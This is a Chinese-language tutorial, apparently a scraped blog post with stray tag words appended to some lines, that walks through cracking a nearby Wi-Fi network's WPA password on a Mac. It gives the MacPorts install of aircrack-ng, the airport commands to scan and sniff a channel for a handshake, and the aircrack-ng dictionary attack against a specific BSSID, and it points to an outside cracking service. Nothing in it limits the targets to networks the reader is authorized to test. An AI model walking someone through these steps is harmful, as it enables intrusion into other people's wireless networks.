安裝macport macport 是一個工具 管理軟件包的一個工具, 咱們也能夠經過別的方式安裝Aircrack-ng, 可是經過macport安裝Aircrack-ng的速度是最快的, (Mac系統要求安裝Xcode, 能夠參考macport的首頁)php
sudo port install aircrack-ng
經過ifconfig命令獲取當前的網卡的名字, 我這邊網卡名字爲en0:shell
使用mac系統自帶的airport工具, 查看當前的無線網絡, 以及它們的相關信息,在shell中執行:網絡
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
系統回顯以下圖, 如下爲我附近全部的wifi, 注意看表格, SSID, BSSID, CHANNEL,這些關鍵詞都會在後面提到:工具
參數en0是我電腦的默認網卡, 數字6是網卡須要監聽的網絡頻道:網站
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6
當執行以上命令, 開始監聽之後, wifi的圖標會發生改變, 變成一個小眼睛同樣的圖標:spa
監聽久一點, 而後使用ctrl+c中止監聽, 系統會把監聽到的數據保存到本地, 以下圖, 數據保存到/tmp/airportSniffdaMCjH.cap 文件中:命令行
在監聽的過程當中若是有用戶登錄這個wifi, 那麼包就會被咱們截獲, 若是用戶一直沒有登錄到這個wifi, 咱們就還要繼續等待監聽, 儘可能在手機或者手提電腦所用高峯期開啓捕獲, 這樣捕獲握手(handshake)的概率比較高, 具體原理參考最後的連接;3d
sudo aircrack-ng /tmp/airportSniff8g0Oex.cap
若是要查詢的路由列表的Encryption值爲WPA(1 handshake) ,說明抓取成功, 否者跳到第六步,要從新抓取:code
-b後面的參數bc:46:99:df:6c:72指的是網卡的BSSID, 最後面的一個文件路徑是上一步監聽到的數據blog
sudo aircrack-ng -w dict.txt -b bc:46:99:df:6c:72 /tmp/airportSniffdaMCjH.cap
只要字典夠大, 密碼破出來應該指日可待, 字典能夠本身去作,或者網上下載
能不能破解主要看臉, 看運氣
破解成功之後,命令行會顯示KEY FOUND :
若是覺的本身弄個字典爆破很麻煩, 有些第三方的網站提供免費爆破,或者收費的爆破, https://gpuhash.me/